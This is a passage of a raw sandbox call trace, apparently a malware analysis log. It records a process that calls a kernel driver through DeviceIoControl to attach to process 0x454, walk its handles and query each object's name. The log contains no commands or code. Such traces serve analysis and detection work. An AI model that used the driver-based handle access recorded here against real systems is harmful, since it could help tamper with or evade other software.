PsReleaseProcessExitSynchronization () returned 0x2 [0147.569] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.569] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fe8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe8044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.569] ObfDereferenceObject (Object=0xfffffa800399c230) returned 0x1 [0147.570] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.570] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.570] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.570] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.570] PsAcquireProcessExitSynchronization () returned 0x0 [0147.570] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.570] ObReferenceObjectByHandle (in: Handle=0xa9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003acdb30, HandleInformation=0x0) returned 0x0 [0147.570] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.570] PsReleaseProcessExitSynchronization () returned 0x2 [0147.570] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.571] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fe9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe9044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.571] ObfDereferenceObject (Object=0xfffffa8003acdb30) returned 0x1 [0147.571] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.571] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.571] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.571] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0147.571] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.571] PsAcquireProcessExitSynchronization () returned 0x0 [0147.571] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.571] ObReferenceObjectByHandle (in: Handle=0xac0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f9c5f0, HandleInformation=0x0) returned 0x0 [0147.571] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.572] PsReleaseProcessExitSynchronization () returned 0x2 [0147.572] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.572] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fea044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fea044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.572] ObfDereferenceObject (Object=0xfffffa8001f9c5f0) returned 0x1 [0147.572] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.572] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.572] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.572] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xaa, lpOverlapped=0x0) returned 1 [0147.572] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.573] PsAcquireProcessExitSynchronization () returned 0x0 [0147.573] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.573] ObReferenceObjectByHandle (in: Handle=0xae4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a5a070, HandleInformation=0x0) returned 0x0 [0147.573] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.573] PsReleaseProcessExitSynchronization () returned 0x2 [0147.573] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.573] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002feb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002feb044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.573] ObfDereferenceObject (Object=0xfffffa8003a5a070) returned 0x1 [0147.573] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.573] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.401] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.401] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0148.401] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.401] PsAcquireProcessExitSynchronization () returned 0x0 [0148.401] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.401] ObReferenceObjectByHandle (in: Handle=0xaf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a5abb0, HandleInformation=0x0) returned 0x0 [0148.401] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.401] PsReleaseProcessExitSynchronization () returned 0x2 [0148.401] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.402] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002faa044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002faa044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.402] ObfDereferenceObject (Object=0xfffffa8003a5abb0) returned 0x1 [0148.402] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.402] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.402] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.402] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0148.402] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.402] PsAcquireProcessExitSynchronization () returned 0x0 [0148.402] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.403] ObReferenceObjectByHandle (in: Handle=0xb08, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028141b0, HandleInformation=0x0) returned 0x0 [0148.403] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.403] PsReleaseProcessExitSynchronization () returned 0x2 [0148.403] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.403] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd0584, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd0584, ReturnLength=0xfffff88005163508) returned 0x0 [0148.403] ObfDereferenceObject (Object=0xfffffa80028141b0) returned 0x1 [0148.403] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.403] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.404] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.404] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.404] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.404] PsAcquireProcessExitSynchronization () returned 0x0 [0148.404] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.404] ObReferenceObjectByHandle (in: Handle=0xb2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017affc0, HandleInformation=0x0) returned 0x0 [0148.404] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.404] PsReleaseProcessExitSynchronization () returned 0x2 [0148.404] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.404] ObQueryNameString (in: Object=0xfffff8a0017affc0, ObjectNameInfo=0xfffffa80030277c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030277c4, ReturnLength=0xfffff88005163550) returned 0x0 [0148.404] ObfDereferenceObject (Object=0xfffff8a0017affc0) returned 0x1 [0148.405] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.405] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.405] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.405] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0148.405] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.405] PsAcquireProcessExitSynchronization () returned 0x0 [0148.405] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.405] ObReferenceObjectByHandle (in: Handle=0xb30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800213ecd0, HandleInformation=0x0) returned 0x0 [0148.405] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.405] PsReleaseProcessExitSynchronization () returned 0x2 [0148.406] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.406] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fdb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdb044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.406] ObfDereferenceObject (Object=0xfffffa800213ecd0) returned 0x1 [0148.406] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.406] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.406] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.406] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.406] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.406] PsAcquireProcessExitSynchronization () returned 0x0 [0148.406] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.407] ObReferenceObjectByHandle (in: Handle=0xb34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017f3da0, HandleInformation=0x0) returned 0x0 [0148.407] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.407] PsReleaseProcessExitSynchronization () returned 0x2 [0148.407] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.407] ObQueryNameString (in: Object=0xfffff8a0017f3da0, ObjectNameInfo=0xfffffa8002fe6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fe6044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.407] ObfDereferenceObject (Object=0xfffff8a0017f3da0) returned 0x1 [0148.407] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.407] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.407] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.408] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0148.408] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.408] PsAcquireProcessExitSynchronization () returned 0x0 [0148.408] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.408] ObReferenceObjectByHandle (in: Handle=0xb38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020b4f20, HandleInformation=0x0) returned 0x0 [0148.408] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.408] PsReleaseProcessExitSynchronization () returned 0x2 [0148.408] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.408] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fe7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe7044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.409] ObfDereferenceObject (Object=0xfffffa80020b4f20) returned 0x1 [0148.409] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.409] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.409] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.409] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.409] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.409] PsAcquireProcessExitSynchronization () returned 0x0 [0148.409] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.410] ObReferenceObjectByHandle (in: Handle=0xb3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001541910, HandleInformation=0x0) returned 0x0 [0148.410] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.410] PsReleaseProcessExitSynchronization () returned 0x2 [0148.410] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.410] ObQueryNameString (in: Object=0xfffff8a001541910, ObjectNameInfo=0xfffffa8002fea044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fea044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.410] ObfDereferenceObject (Object=0xfffff8a001541910) returned 0x1 [0148.410] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.410] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.410] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.411] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0148.411] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.411] PsAcquireProcessExitSynchronization () returned 0x0 [0148.411] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.411] ObReferenceObjectByHandle (in: Handle=0xb40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800200fcb0, HandleInformation=0x0) returned 0x0 [0148.411] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.411] PsReleaseProcessExitSynchronization () returned 0x2 [0148.411] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.411] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fdc044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdc044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.412] ObfDereferenceObject (Object=0xfffffa800200fcb0) returned 0x1 [0148.412] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.412] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.412] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.412] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.412] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.412] PsAcquireProcessExitSynchronization () returned 0x0 [0148.412] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.413] ObReferenceObjectByHandle (in: Handle=0xb44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001819120, HandleInformation=0x0) returned 0x0 [0148.413] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.413] PsReleaseProcessExitSynchronization () returned 0x2 [0148.413] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.413] ObQueryNameString (in: Object=0xfffff8a001819120, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.413] ObfDereferenceObject (Object=0xfffff8a001819120) returned 0x1 [0148.413] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.413] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.413] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.413] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0148.414] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.414] PsAcquireProcessExitSynchronization () returned 0x0 [0148.414] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.414] ObReferenceObjectByHandle (in: Handle=0xb48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800203e570, HandleInformation=0x0) returned 0x0 [0148.414] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.414] PsReleaseProcessExitSynchronization () returned 0x2 [0148.414] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.414] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002feb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002feb044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.414] ObfDereferenceObject (Object=0xfffffa800203e570) returned 0x1 [0148.414] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.415] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.415] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.415] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0148.415] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.415] PsAcquireProcessExitSynchronization () returned 0x0 [0148.415] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.415] ObReferenceObjectByHandle (in: Handle=0xb4c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001819ac0, HandleInformation=0x0) returned 0x0 [0148.415] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.415] PsReleaseProcessExitSynchronization () returned 0x2 [0148.416] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.416] ObQueryNameString (in: Object=0xfffff8a001819ac0, ObjectNameInfo=0xfffffa8002456044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002456044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.416] ObfDereferenceObject (Object=0xfffff8a001819ac0) returned 0x1 [0148.416] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.416] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.417] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.417] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0148.417] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.417] PsAcquireProcessExitSynchronization () returned 0x0 [0148.417] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.417] ObReferenceObjectByHandle (in: Handle=0xc24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00328f790, HandleInformation=0x0) returned 0x0 [0148.417] ObfDereferenceObject (Object=0xfffff8a00328f790) returned 0x1 [0148.417] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.417] PsReleaseProcessExitSynchronization () returned 0x2 [0148.417] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.417] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.418] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.418] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.418] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0148.418] PsLookupProcessByProcessId (in: 